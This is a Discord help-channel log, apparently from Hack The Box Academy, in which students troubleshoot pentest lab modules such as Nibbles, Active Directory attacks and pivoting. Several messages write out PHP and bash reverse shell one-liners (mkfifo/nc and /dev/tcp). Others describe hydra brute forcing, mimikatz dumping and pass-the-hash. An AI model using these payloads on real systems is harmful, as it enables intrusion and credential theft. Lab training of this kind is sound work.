#modules

1 messages Β· Page 319 of 1

proven raft
#

If i'm www-data, how can I view this file "-r-------- 1 gigi gigi 39 Mar 2 2022 flag.txt"?

steady charm
#

what?

cloud urchin
proven raft
steady warren
#

@steady charm m telling that which one will u prefer hacking or cyber security

cloud urchin
proven raft
steady charm
steady warren
#

Nah nah @steady charm it may be similar but has different works cs go for only finding ways to defend and hacking exploits and do hacking

proven raft
cloud urchin
steady charm
cloud urchin
steady charm
acoustic owl
zealous rune
#

hi, i'm having some issues connecting via xfreerdp to the target in the module section "Internal Password Spraying from Windows" in the Attacking AD module

dim wolf
steady warren
#

@steady charm nope it's like Bug Bounty and pen testing bug Bounty only goes for finding big and report but pen testing find vulnerabilities and resolves them

#

They r both alike but different

zealous rune
#

The xfreerdp command executes fine I get a cert warning and then my client attempts to connect but I get black screen instead of interface to the target

steady charm
steady warren
#

@dim wolf now who r u to interrupt

dim wolf
#

a moderator of this discord server

steady charm
#

Also very poor attitude my dude πŸ™‚

cloud urchin
steady warren
#

This all is being such a drag

dim wolf
#

this is not the channel to be discussing stuff not related to Academy modules, if you want to continue you may do so in #general

steady warren
#

Who cares

quiet trout
#

signal to noise, we need this space reserved for people who are actively working the academy

acoustic owl
quiet trout
#

and those who wish to help

steady warren
#

I am directly redirected to this chat

dim wolf
#

you can access the channel by verifying your account, read and follow #welcome

steady warren
acoustic owl
cloud urchin
#

bro you can continue the conversation just in the appropriate channel 2 mods told you now.. just move the convo there so you don't get banned or something

#

this channel is like a library for studying not general talk

median gale
#

Should it be a common password, rock you would have found it already so I guess it is somewhere in the system ?

#

Any other hint anyone ?

muted kindle
fathom pendant
#

No

fathom pendant
median gale
median gale
fathom pendant
#

There's not many you would have created

#

You attained will's password from the previous section

median gale
#

Why will's password be of any match to kira's possible passwrods though?

fathom pendant
#

No

#

The full mutated list

median gale
#

Ah!

#

Thank you very much again

fathom pendant
#

Each user has a unique password

zealous rune
fathom pendant
zealous rune
#

yeah normally i search the messages... i didn't this time πŸ˜‰

hollow frigate
#

Does anyone know if there will be any artwork for the new modules? I just finished the API Attacks module and noticed that it has a question mark badge.

fathom pendant
#

Usually 6+ months after they're released

median gale
#

You can see the artist message behind it to becurious, like realy curious

quiet trout
#

maybe i need to actually pull the keys?

#

ok i see, the describe cmd doesnt actually list column info

fathom pendant
#

For union to work, you need to have the same number of columns

quiet trout
#

yeah i thought the describe cmd listed columns, any way to do that without a select statement?

fathom pendant
#

The 2 columns from one are dept_no and dept_name

quiet trout
#

or is that just the way to do it?

fathom pendant
quiet trout
#

nvm chatgpt got me sorted'''' show columns from table;

#

oh... cols are the rows with describe

fathom pendant
#

Deleting bc spoilers

#

Yes

wet aspen
#

am facing the same issue

#

can someone help with this ?

#

`dig axfr @10.129.203.6 inlanefreight.com

; <<>> DiG 9.18.16-1-Debian <<>> axfr @10.129.203.6 inlanefreight.com
; (1 server found)
;; global options: +cmd
; Transfer failed.
`

#

been trying so many ways to fix this ... but non working

fathom pendant
wet aspen
#

yup i did it

fathom pendant
#

So you found the x.inlanefreight.htb?

cloud urchin
#

make sure you use the right ip in the resolvers.txt

fathom pendant
#

That too

wet aspen
fathom pendant
#

Yes

wet aspen
fathom pendant
#

So dig that subdomain

wet aspen
#

then used dig on each of the sub domains

#

non of them connecting

fathom pendant
#

using the @ip

wet aspen
#

yup i did it

cloud urchin
#

if it doesn't allow a trasnfer you may need to brute force it like marcielee said

fathom pendant
# wet aspen .

So you did
dig axfr subdomain.inlanefreight.htb @ip on each found one?

wet aspen
#

yup i did the exact same thing

#

non of them worked

fathom pendant
#

Assuming you didn't mess with the names.txt

quiet trout
#

if this is the module i think it is, have you checked the BIND configs?

fathom pendant
#

Bro

#

Checking BIND configs is out of scope for the question

zealous rune
#

New Modules

#

hmmmm, i didn't know about these

cloud urchin
#

make sure /etc/hosts doesn't have anything in it

acoustic owl
wet aspen
cloud urchin
#

yeah so it found the server and failed the axfr

wet aspen
fathom pendant
#

^

#

It sounds like you used subbrute on .com not .htb

wet aspen
#

yah true

#

mah bad

#

lemme see if it works

fathom pendant
#

Rerun subbrute using inlanefreight.htb instead

wet aspen
#

alright imma update u

#

yo i got the flag ... thx alot guys, just a simple mistake i did

novel lynx
nova ocean
#

hi guys i am stuck in Attacking Common Services can anyone help me?

barren rose
#

Hello everyone, I just finished Windows Event Logs & Finding Evil module and i would have a question regarding the last question in the Skills Assessment, not sure I really understand why the answer is the answer ...

quiet trout
#

im leaning php? as database() was previously used, but im only half sure that database() itself is php.

fathom pendant
nova ocean
#

hi guys i am stuck in Attacking Common Services can anyone help me? i am doing skill assessment easy but i cant find nothing any hint?

quiet trout
#

sure, but i dont recognize that convention we've previously used things like standard sql syntax in the search field... and stuff like INFORMATION_SCHEMA... and TABLE_SCHEMA... nothing with a function or db.table notation

nova ocean
#

what list should i use the one in resources?

fathom pendant
fathom pendant
nova ocean
#

i got a user from smtp enum but i did use pws.list and found nothing on ftp,rdp,smtp

#

and used also the usernames.list and nothing

#

is it bug?

fathom pendant
#

Nope

#

Remember the username won't be user@domain

nova ocean
#

yea i used user

#

hydra -l user -P pws.list service://<ip>

fathom pendant
#

You'll need to reduce the threads for ftp

#

Quite a bit

nova ocean
#

even the default one?

#

i should make it -t 4 probably

fathom pendant
#

Lower

#

The password isn't deep on the list, so don't worry about it potentially taking forever

nova ocean
#

-t1

#

sorry for asking, i have student subscription cant see answers so is harder

fathom pendant
#

You don't need to be able to see the answers to arrive at the solution

nova ocean
#

yea sometimes u stuck dont know what ur doing wrong

fathom pendant
#

In general; if cracking the password yields an error, or is taking > 20-30 minutes you're likely doing something wrong

quiet ledge
#

when first starting out via the starting point, are the walkthroughs for you to go along and learn or more of just information?

fathom pendant
median gale
#

It is asking a lsass dump right?

nova ocean
#

is pws.list is the correct list for this assessment easy?

fathom pendant
#

Rockyou is fine

nova ocean
#

thanks

fathom pendant
#

Also; make sure to run cmd/powershell as admin before running mimikatz

nova ocean
#

marcielee how long it took u to remember all answers XD
ur pretty good

fathom pendant
#

I struggled through it

#

Β―_(ツ)_/Β―

#

Failure teaches lessons that success won't

median gale
nova ocean
median gale
#

pass the hash section

fathom pendant
#

What section

median gale
#

pass the hash

fathom pendant
#

Also you're not using the right dump

median gale
#

dump?

#

What dump?

fathom pendant
#

Christ

#

The dump method

median gale
#

You mean the method used to extract the hashes ? the hash dump ?

median gale
#

Didnt know there where other kinds of dumps also

#

thanx

fathom pendant
#

Learning how tools you use work prevents you from being a skid

distant island
#

i need help with the Command Injections - Skills Assessment

fathom pendant
#

Did you try injecting the command?

distant island
fathom pendant
#

Mess with all the functionalities of the service

distant island
nova ocean
#

hi again i am still stuck is my username correct fiona?

#

still didnt crack that ftp with rockyou

fathom pendant
fathom pendant
nova ocean
#

yea i did

fathom pendant
#

Not the whole f*@domaim

#

Just f*

distant island
fathom pendant
nova ocean
#

is taking forever

fathom pendant
#

That should work or 1 thread

nova ocean
#

oh ok

fathom pendant
#

But it shouldn't take long

nova ocean
#

i lower it to 1

half beacon
#

@fathom pendant

fathom pendant
#

What does any of that have to do with htb academy?

distant island
#

but no signs of mine is being used

fathom pendant
#

Look for errors πŸ˜‰

unique ether
#

Can a skill assessments in one section can be related to the previous section skills as well?

fathom pendant
#

You mean a previous skill assessment in the same module?

#

Generally: no

#

But it depends

#

If they are linked, they're highly explicit about it being linked

cloud urchin
#

i know of at least one that requires prerequisite knowledge from a previous module

fathom pendant
muted jacinth
#

Hey guys, can someone give me a hint for the last question of the skill assessment of the dacl attack II module?

limber pier
#

Hello everyone, brand new to HTB and pretty raw in IT/Cybersecurity in general (so please forgive my ignorance).

I’m on the Setting Up module within the InfoSec Foundations course. Am I supposed to be following all the steps concerning downloading all the different apps and setting up VMs? Or is it just a follow through example to give you the idea? I’m feeling a little overwhelmed with all the apps for notes, VMs, containers,

I was hoping everything I need would be within a pre-set VM image like in the CTF challenges?

fathom pendant
#

You won't find a vm that will contain all the tools

#

You will generally run into a situation where you'll need to download/install a tool

limber pier
#

Great, thank you for the fast reply. I’ll download each thing as I find I need it then, that seems much more palatable than staring down the long list of tools and learning how to use them all in one go. Thank you.

fathom pendant
#

Oh I definitely wouldn't recommend learning the tools all at once

#

The academy modules generally stick to a handful of tools on a given module

distant island
fathom pendant
#

You need to read a file, so... try that

#

You might need to combine methods

cerulean hinge
#

Hello,

I'm doing the Skill Assesment for the Active Directory Enumeration & Attack module.
I managed to run sharphound on the victim machine and I want to get the .zip file generated.
Do you guys have advice when it come to retrieve a file from the victim machine and upload it to our kali ?
I have a meterpreter shell but the download command is not working.

muted jacinth
cloud urchin
#

there are many ways. a share via rdp is easy. you can scp with powershell. you could also just create an smb share.

cerulean hinge
#

Ok thanks for the advice I will try them

muted jacinth
cerulean hinge
#

Thanks. I managed to get my .zip file but I will note your advices, it will definitly help me again πŸ™‚

cloud urchin
#

there's also a whole module on file transfers

cerulean hinge
#

It's in my ToDo list !

muted jacinth
#

I swear to fkn god they're giving hints like enigma "Search for rights in non-common locations where you can control everything.". like yeah dude thx. "keep searching"

#

asking you to only use what you learned in the module, what a joke

distant island
fathom pendant
distant island
steady charm
#

I am going to go crazy, spend a few good hours doing the AD Assessment 2 just for the DC to crap out at the last step. Insane...

muted jacinth
#

I Think i will guenuinely give up for this dog shit ass module. If anyone ever accomplish to solve the DACL attack II skill assessment i would gladly discuss on how you're a litteral god. until then

steady charm
#

OH NVM THE FREAKING VM'S CLOSED THEMSELVES.........asdasdasdjhasjdasjdsa

steady charm
#

too bad I forgot about the timer existence, the assessment was too good. fully immersed

#

but this sucks...literally at the last step. all I had was to psexec inside the DC

fathom pendant
#

Well

#

You should know the steps to get back there

#

Β―_(ツ)_/Β―

limber river
steady charm
#

Yup I am done

#

Just annoying I had to restart ligolo

#

One module left and I'm finally done

cerulean hinge
fathom pendant
#

The pentester path builds off skills in itself

fickle topaz
#

how guys!!!

tender nimbus
vagrant osprey
#

yall i am TWEAKING for real

real delta
vagrant osprey
#

Getting Started --> Nibbles Initial Foothold

I cannot get into the shell. I have literally been trying on and off for WEEKS and youtube walkthroughs are only confusing me more, i can't get past the part where you curl the myimage webpage

#

please please please can someone help me figure out why on earth a shell won't come up

tender nimbus
#

module: footprint

trim frost
ocean night
#

Again, please do not share screenshots like that for modules over Tier 0.

real delta
trim frost
vagrant osprey
ocean night
#

Because posting potential spoilers for modules over Tier 0 is not allowed.

ocean night
#

Try and ask your question without posting such screenshots.

real delta
vagrant osprey
trim frost
vagrant osprey
tender nimbus
#

So can someone help me for smtp username enumeration? i already use some commands but all the usernames i tried were wrong

trim frost
# vagrant osprey

so is the php file there though? you are listening for it but the webpage exists?

tender nimbus
# vagrant osprey

if i remember if you image is uploaded try to refresh you browser πŸ™‚

vagrant osprey
#

yes, the php file uploads

tender nimbus
#

while opening a listner

trim frost
#

so you have the listener open, you go visit the php page and nothing happens?

vagrant osprey
#

yes

#

i tried both by refreshing the page and by curling it, neither time does any shell start

trim frost
#

and the php page has your IP for tun0 and your port for the listener? 9443 or whatever?

vagrant osprey
#

it should, how can i check?

trim frost
#

look at the php file you upload?

foggy monolith
#

Check to make sure you have the IP address of the PHP reverse shell set to match the IP address of your attack machine. Keep in mind that when you're doing a reverse shell, the target is the client and the attacker is the server.

vagrant osprey
#

yeah it's there

trim frost
#

yes, so you upload a php file, it has your tun0 IP and the port (9443 in that example), you go visit the PHP file you uploaded, and that works?

vagrant osprey
#

what is the tun0 IP, the target machine w nibbles on it right?

#

if so, then yeah that's the one

trim frost
#

its your IP, if you are using your own VM, it is tun0

foggy monolith
#

Read the PHP code and check to make sure you have the PwnBox IP address in it, because you want it to connect back to you.

trim frost
#

if you are using the pwnbox, I'm not sure

vagrant osprey
woeful elbow
#

Hi

trim frost
#

ok but you upload the file, what is the IP and port in the php file you upload? it should be the attacker (aka you) IP and the port you are using for your reverse shell

vagrant osprey
#

in the file it says

<?php
system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.129.193.209 9443 >/tmp/f");
?>

with the ip being the target machine

trim frost
#

no

#

the ip is your ip

#

aka if you are using the pwnbox, it is the pwn box ip

foggy monolith
trim frost
#

basically you are telling the webserver, "connect back to me" and giving it the IP of wherever you put nc -nvlp 9443

vagrant osprey
tender nimbus
tender nimbus
#

smtp section

vagrant osprey
#

as in, i'm still not getting the cmd line connection

trim frost
#

and you reuploaded your php file?

vagrant osprey
#

that would be what a person with common sense would do, isn't it 😭

#

one moment lemme do that lol

trim frost
#

🀣

trim frost
foggy monolith
vagrant osprey
#

ok i reuploaded the php and tried the steps again, still no response on the cmd

foggy monolith
#

Check to make sure that you don't have 2 PHP pages on the target. Reuploads cause duplicates.

trim frost
#

yeah maybe name it something else

foggy monolith
#

The server doesn't overwrite anything. You need to make sure to point it at the new file name.

#

Also, always re-run Netcat before loading the new target page, because Netcat is just listening for connections from the target.

trim frost
#

also you could try other shells too, this is the one I commonly use
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"<attacker ip>"/8888 0>&1'");?>

vagrant osprey
foggy monolith
#

Alright, try resetting the target machine and going from there.

trim frost
#

yeah that is true, a reset is a good idea if you have been doing something and it is still failing

foggy monolith
# vagrant osprey i will try this

Also, is there any "Connection from" messages in the Netcat terminal? If so, then you actually do have a shell β€” by default, you won't see any shell prompts and need to actually run some commands like source /etc/bash.bashrc to actually get a prompt on the target.

vagrant osprey
vagrant osprey
#

9443 when i used the previous one

trim frost
#

so you tried mine, you put in the IP of the pwnbox and nothing?

safe star
#

i just tried it with this and it worked rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <attacker ip> 4444 >/tmp/f

vagrant osprey
#

i will try that

trim frost
#

that is your original one

safe star
#

hmm

trim frost
#

is it not?

#

oh no, you had system

vagrant osprey
#

my brain is fried from nibbles but i refuse to sleep tonightuntil i get past it

#

nibbles will torment me no longer

safe star
#

are you using the pwnbox only?

vagrant osprey
#

yes

whole grotto
safe star
vagrant osprey
safe star
# vagrant osprey yes

yeah <?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <IP> 4444 >/tmp/f'); ?>

vagrant osprey
#

ok yeah ty

trim frost
#

yeah that, you'll need to make sure whenever you doing a reverse shell as a php page you upload, you start it with <?php and end it with ?>

vagrant osprey
#

nope still no connection

trim frost
#

ok so I hate to say it but can you do an ifconfig on your pwnbox and show it here?

safe star
#

its in this directory right? /nibbleblog/content/private/plugins/my_image

vagrant osprey
#

yes

#

image.php

trim frost
#

ok so it is tun0

safe star
#

what does your php file look like?

vagrant osprey
#

no it has this

<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 94.237.59.46 4444 >/tmp/f");
?>

trim frost
#

no, you need the tun0 IP (10.10.x.x)

#

and go ahead and delete your screenshot

vagrant osprey
#

still nothing

short hearth
#

Hey guys, I am new to Discord, and currently stuck on the 'Pivoting, Tunneling & Port Forwarding' module. Specifically, I cannot connect to the rdp as I keep getting the following error: "xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
[18:37:29:387] [215271:215272] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]
[18:37:29:387] [215271:215272] [ERROR][com.freerdp.core] - failed to connect to 172.16.5.19
".

This is form the 'Dynamic Port Forwarding with SSH and SOCKS Tunneling' chapter of the module, any suggestions?

trim frost
#

so nc -lnvp 4444

vagrant osprey
#

yes

trim frost
#

and <?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.228 4444 >/tmp/f");
?>

vagrant osprey
#

yes

trim frost
#

and you uploaded as new file name?

vagrant osprey
#

yes

trim frost
#

and you go to that in the webpage and /shell.php
and you get a blank page?

#

(if shell.php is what you named it that is)

vagrant osprey
#

yes

#

wait

#

is it supposed to show something other than image.php? because every time i upload a new thing it stays as image.php on the site, but the size of the file changes

safe star
#

so u have no other vms open?

vagrant osprey
#

no

#

only pwnbox

trim frost
#

so the page you visit is the one you upload

#

so if you upload shell.php, you go to that page, not the page where you upload files

safe star
vagrant osprey
#

just wanted to make sure

trim frost
#

where is the file you uploaded?

vagrant osprey
trim frost
#

so yours is imagemy.php?

vagrant osprey
#

most recent is zoi.php

trim frost
#

or one of those?

#

ok then you see zoi.php on the server?

vagrant osprey
trim frost
vagrant osprey
#

i get a 404

#

nope now it's a not found, no number

safe star
#

nah the box renames the file to image.php

trim frost
#

Yeah I'm reading the walkthrough now

#

so then you do access image.php and then nothing happens?

vagrant osprey
#

yes

#

no connection in terminal

trim frost
#

ok copy and paste your php file again?

#

zoi.php

vagrant osprey
#

<?php
system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.228 4444 >/tmp/f");
?>

#

no way

#

a freaking

trim frost
#

try the original again
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>

vagrant osprey
#

typo in my thing i just noticed

#

1 sec

trim frost
#

I am wondering if you do need /bin/sh vs sh

#

you will be a reverse shell master after this tho

vagrant osprey
#

OMG

trim frost
#

got it?

vagrant osprey
#

OMG

#

IT DID THE THING I GOT THE THING

trim frost
#

hey look at you

vagrant osprey
#

no hopes up yet

safe star
#

what did you change

vagrant osprey
#

have to finish this through first before celebrating

vagrant osprey
#

🫠

#

moment of truth

#

you are literal angels oh my god

#

cannot thank yall enough

#

i get to sleep tonight prayge

trim frost
#

onwards and upwards

vagrant osprey
#

why is there more

#

nibbles please

trim frost
#

gotta get root now

vagrant osprey
#

by "your ip" which ip is it referring to? i tried the target and the 10.10 one

#

got connection refused 404 on the first and just 404 on the second

trim frost
#

so your ip is the 10.10

#

you have to start a webserver on port 8080 on the pwnbox

#

and have LinEnum.sh in that directory of where you start the webserver

vagrant osprey
vagrant osprey
trim frost
vagrant osprey
solar kestrel
#

Hi?

#

I'm new here and I would like to learn about computing πŸ˜„

floral loom
#

[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm facing trouble with finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?

vagrant osprey
solar kestrel
quiet trout
#

|| here's roots secure_file_priv contents ||

vagrant osprey
#

no. nonononononononononononono.

#

my pwnbox ran out of time and now i don't have access to the nibbles shell????

trim frost
floral loom
#

[Help information gathering - web edition - Skill assessment]
Hello everyone, i'm facing trouble with finding the API key, although I already have the full subdomain AND also the admin directory.
I can't access it via browse, nor via curl.
I have all the other flags, but this one is killing me. Anybody could help me, please?

trim frost
#

that one, I don't remember Camil (maybe I should take better notes)

floral loom
quiet trout
trim frost
#

if I can figure out this sqlmap assessment, I can go look 🀣

vagrant osprey
quiet trout
#

gucci mayne!

floral loom
trim frost
#

awesome

floral loom
vagrant osprey
cloud urchin
#

a 404 error means it couldn't find the file requested

safe star
cloud urchin
#

a 404 means the server is up, and the server responded saying it couldn't find the file or page

safe star
#

oh

#

yeah, then what supernuts said

vagrant osprey
safe star
#

is the file in the directory you ran it?

vagrant osprey
vagrant osprey
safe star
#

linenum has to be in the same directory as the http server

trim frost
#

is the LineEnum.sh file in the same directory you ran python3 -m http.server?

vagrant osprey
#

i dont understand, im sorry

trim frost
#

ok so on the pwn box, you typed 'python3 -m http.server', right?

vagrant osprey
#

yes

cloud urchin
vagrant osprey
#

sudo python3 -m http.server 8080

on pwnbox

safe star
#

if linenum isnt in there then the file cant get downloaded

trim frost
#

so where is the LinEnum.sh file ? what directory did you type 'sudo python3 -m http.server 8080'?

trim frost
#

so then your LinEnum.sh file will also need to be on Desktop

vagrant osprey
#

nibbler doesn't have a desktop

safe star
#

wym

trim frost
#

not on nibbler, on the pwnbox

#

you are trying to transfer a file from the pwnbox to nibbler

vagrant osprey
#

in /home/nibbler, i did the wget

in ~/Desktop, i did sudo python -m http.server

trim frost
#

ok so the file on the pwnbox you want to transfer to nibbler, has to be in ~/Desktop

vagrant osprey
#

OHHHHHH

#

wait i think i understand hold on

safe star
vagrant osprey
#

nope nvm i dont

safe star
#

u will understand

vagrant osprey
safe star
#

are you sure its 8080?

vagrant osprey
#

yes

trim frost
#

ok firefox on the pwnbox

vagrant osprey
#

yes

trim frost
#

if you type that in, you get unable to connect?

rustic sage
#

@signal shell

rustic sage
#

Do you need help with elastic stack still?

safe star
#

http server is 8000 by default im pretty sure

#

try 8000

vagrant osprey
#

i'll try that

#

still 404

#

the firefox works though

trim frost
#

ok, so on your terminal with the sudo python3 -m http.server, do you see attempted connects?

vagrant osprey
#

yes

#

now there's a 200

trim frost
#

ok so anyway, you are starting a webserver from your ~/Desktop

#

you want to transfer a file from ~/Desktop to nibbler

#

so you have to ensure that file is in the ~/Desktop folder

safe star
vagrant osprey
safe star
#

you dont see any files in firefox?

trim frost
#

so do you have LinEnum.sh somewhere on your pwnbox?

#

you might have to go find it (google or what not) if not

vagrant osprey
vagrant osprey
safe star
#

is linenum in there?

trim frost
#

on pwnbox, not on nibbler

vagrant osprey
vagrant osprey
safe star
#

then u have to start the server where linenum is

vagrant osprey
#

i have to go, ill pick up with this tmrw

#

thank yall so much for your help, i really appreciate it

fathom pendant
trim frost
trim frost
novel lynx
#

Pivoting, Tunneling, and Port Forwarding/Web Server Pivoting with Rpivot. When I run this command on my attack host should i be getting feedback, or is it supposed to be waiting? python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

safe star
#

can you talk to the internal network?

novel lynx
safe star
#

when u connect the client to the server

#

i cant remember if there is supposed to be output but the the best way to check would be to connect to the server and try to talk to the internal network

novel lynx
#

so when i run the server.py, nothing happens, and then when i run client.py on the target it says "Backconnecting to server 10.10.14.18 port 9999
", but after that i think i'm supposed to get this "New connection from host 10.129.202.64, source port 35226
". but i do not see it on my attack host

fathom pendant
trim frost
fathom pendant
#

The module walks you through it

fathom pendant
trim frost
#

I mean for people that are totally new, seems confusing to them

fathom pendant
#

99.9999% of the time, if a tool was mentioned that's from github or not in apt, then it's a link in the module/reading

trim frost
#

I had to go check the module to see, they use Linpeas in another section but then mention downloading LinEnum through a python webserver

fathom pendant
#

Imo it's easier to just have people see what they can [su]do

safe star
fathom pendant
#

Linpeas and linenum just spit a lot of noise which can be very much counterproductive

novel lynx
trim frost
#

true

safe star
fathom pendant
#

They're very much tools for more experienced people

safe star
#

what port did you choose 9999 or 9050?

#

should be 9999

novel lynx
safe star
#

yeah

#

until i connect back

#

i read that wrong

#

i mean no it doesnt give me anything unless i connect to it

novel lynx
#

client.py --server-ip 10.10.14.18 --server-port 9999, i think this is the problem then, i should be putting in my attack box ip here huh?

safe star
#

yes

novel lynx
#

i get too lost in the sauce with the copy/paste sometimes haha...brb

safe star
#

your attack box opened port 9999

novel lynx
#

that was the issue, tysm

clear rover
novel lynx
#

ok stuck again, got here: New connection from host 10.129.233.233, source port 37394, added the line "socks4 127.0.0.1 9050" to the /etc/proxychains.conf, and ran the proxychains firefox-esr 172.16.5.135:80
on the attack box, but it is still spinning

#

@safe star

safe star
#

can u curl it?

novel lynx
#

this Pivoting, Tunneling, and Port Forwarding got my head spinning 😡

fathom pendant
unique ether
#

229 Entering Extended Passive Mode (|||15660|)
150 Opening ASCII mode data connection for file list
226 Transfer complete

#

why am i getting this

fathom pendant
#

Because you downloaded a file via ftp?

#

The numbers in front of the lines are status codes

clear rover
fathom pendant
#

2xx codes are success, 1xx are info, 4xx are errors

#

3xx are usually "resource not in this location"

#

5xx are usually server response codes

grand portal
#

Finally done with Footprinting module. It was so far the best experience in my few years of Cybersecurity.

fathom pendant
grand portal
#

Frankly, the medium lab was harder than hardlab- for me.

unique ether
#

Ls*

fathom pendant
unique ether
#

It did not display but I'll try ls la

fathom pendant
#

Also helps to say which module and section you're doing

unique ether
#

Rn

#

Ls -la

#

Worked

fathom pendant
#

πŸ‘

unique ether
#

I though I lost my brain cells for a sec

fathom pendant
#

Never forget the basics

remote fulcrum
#

Stuck with a Q on the Shells&Payloads module. Section PHP Webshells. The last Q asks how the uploaded picture is called. Thing is that I could upload a .php script, by adjusting the content-type. So the webshell I can access is just its name (with .php). The Question answer format is xxxx.gif. So I am confused. Can anyone shed a light on this?

safe star
#

reread the question

#

its asking for other files in the directory

remote fulcrum
remote fulcrum
unique ether
#

Footprinting lab medium I got an rdp connection and opened mssql management tool after that I changed it to windows authentication

#

And still I cant access

fathom pendant
unique ether
#

Alright

#

Yea I got it

spiral spoke
#

Hi! When was the last update for Server-Side Attacks Module? it was the last year or a few weeks ago? πŸ€”

wicked apex
#

Module: Active Directory Enumeration & Attacks
SectionAD Skill assessment 1
I obtained access to MS01, how do I transfer file from the inital pivot host WEB01 (windows) to MS01?
does net use require smb in ms01 enabled?

wicked apex
#

I've been using ||xfreerdp's drive option|| and it is constantly disconnecting itself

safe star
#

wait i read that wrong

undone hazel
#

Hello, has anyone here done the Information Gathering Web edition module new update? I'm stuck in the Subdomain Brute forcing part, I have tried using gobuster with DNS seclists with ns1-2.inlanefreight.com and with blog... but I get no results from it.

wicked apex
# safe star wait i read that wrong

You are technically correct since I can portforward the web server port from attack host to the host beyond the pivot host
im using ligolo lemme figure it out

safe star
#

i got it with 2 diff tools

steady charm
wicked apex
steady charm
#

remmina is nice because you work from a GUI. you can also set up connection profile to easily re-access a session. passing the hash is also very simple

undone hazel
safe star
#

thats the syntax for dnsenum

undone hazel
#

sorry yes

#

that's the dnsenum command

safe star
#

you dont need to add the subdomains

undone hazel
#

and I get the error: NS record query failed: NXDOMAIN

safe star
#

use --dnsserver 1.1.1.1 or a known dns server

undone hazel
safe star
#

and it just stops there?

safe star
undone hazel
#

before the command was working just not giving any results

safe star
#

thats weird

#

try gobuster

undone hazel
#

ah

#

I did something dumb

#

i juste didn't pay attention and changed .com to .htb

#

It worked!

#

thanks a lot

safe star
#

i was gonna ask that but u were typing .com in chat

undone hazel
#

but I don't quite understand why is it necessary to specify a dns server?

safe star
#

the dnsserver flag isnt needed

#

it automatically picks one from the resolve.conf im pretty sure

undone hazel
#

so why didn't it work without the --dnsserver flag?

safe star
#

well u said that u picked the wrong domain

hexed tartan
#

any help why access is denied? the service is opened

undone hazel
wooden summit
#

hey there, I 'm doing Sqlmap Essentials -> Database Enumeration, is http://.../case8.php the correct for this module? I 'm kinda baffled, would appreciate the help πŸ™‚

safe star
#

1.1.1.1 is the fastest resolver so i usually pick that

undone hazel
#

well in any case thanks a lot this was driving me nuts and I lost a good chunk of time

wooden summit
faint geode
#

Hey guys Im stuck on the last question for rpivot in the "Web Server Pivoting with Rpivot" section, I have successfully gotten to the Apache Default page but it says "Using the concepts taught in this section, connect to the web server on the internal network. Submit the flag presented on the home page as the answer."

safe star
#

try curl

faint geode
#

Like curl -I http://<IP of Apache Default Page>:80 ?

safe star
#

yes

faint geode
#

proxychains curl http://<IP of Apache Default Page>:80 ?

#

Cant see the flag, any idea what the flag should look like ?

hexed tartan
safe star
#

thats what i used cause i couldnt open with firefox

#

lemme see

safe star
hexed tartan
#

i dont know why access is denied

safe star
#

did you open cmd as admin?

hexed tartan
faint geode
hexed tartan
#

ok service smbd was disable

safe star
#

the flag is in there

hexed tartan
#

i think

safe star
#

u missed it @faint geode

faint geode
#

Ive tried with and without

safe star
safe star
#

its near the top

hexed tartan
ionic minnow
#

Is the server having issue, the target has been spawning for more than 30 minutes

safe star
oak lance
#

I'm working on the CrackMapExec module and I just can't get it to run in LDAP mode. I can't find any documentation about SMB shares in LDAP mode. Can anyone shed any light, please?

β”Œβ”€β”€(kaliγ‰Ώkali)-[~/.cme]
└─$ crackmapexec ldap dc01.inlanefreight.htb -u grace -p Inlanefreight01!                            
object address  : 0xffff95ac4820
object refcount : 4
object type     : 0x969dc8
object type name: NameError
object repr     : NameError("name 'smb_share_name' is not defined")
lost sys.stderr
safe star
#

and powershell

safe star
#

and just run "python3 -m pyftpdlib -w" on ur machine

faint geode
#

Its not ver clear at all what the flag is tbh

violet coyote
#

Is anybody working on module Intro to Windows Evasion? Seems there is a problem with InstallUtil task, it is unsolvable

safe star
safe star
hexed tartan
faint geode
safe star
#

look around the title

wicked apex
#

Does any one got any clue on mapping network folder/drive on remmina like in xfreerdp?
In xfreerdp I can simply provide the path in /drive:<path> it just werk
what about in remmina?
I have been digging around its documentation and guides

faint geode
safe star
#

proxychains curl <IP> | grep I

#

i see 2 instances

faint geode
safe star
#

ye

runic talon
#

I am stuck in Attacking Enterprise Networks
Active Directory Compromise module in question After obtaining Domain Admin rights, authenticate to the domain controller and submit the contents of the flag.txt file on the Administrator Desktop. I have managed to get Server Admin privileges and get the admin hash but when i do PTH i get denied or timeout

steady charm
nova ocean
#

hi guys anybody can help with skills assessment Attacking Common Services - Easy i am stuck on mysql part cant find what to search for

steady charm
#

there is a big share folder field

#

i have no idea what the user is and you should remove that due to spoilers. but run psexec as the user that has administrative rights + their hash

runic talon
#

ok thans

faint geode
nova ocean
#

any help? on attacking common services?

shy charm
#

xfreerdp stuck on the blackscreen

#

how to troubleshoot this

wicked apex
steady charm
shy charm
#

Remmina works so well thanks!

steady charm
#

same problem will pop up in remmina

wicked apex
#

I don't think ms01 likes the idea of lazagne it freezes everytime I wanna trasfer it

steady charm
#

just press enter on the black screen

shy charm
wicked apex
#

Module: AD
Section Skill Assessment 1
Question 6
I've been stuck w/ user t... as I am trying to look for its cleartext password
its hash cannot be cracked via rockyou and I looked around here to know that its cleartext password is available in memory or something.
Thus I tried mimikatz w/ logonPasswords, as well as lsassdump w/ mimikatz again.
Is there any other stuff I missed/overlooked?

idle sigil
#

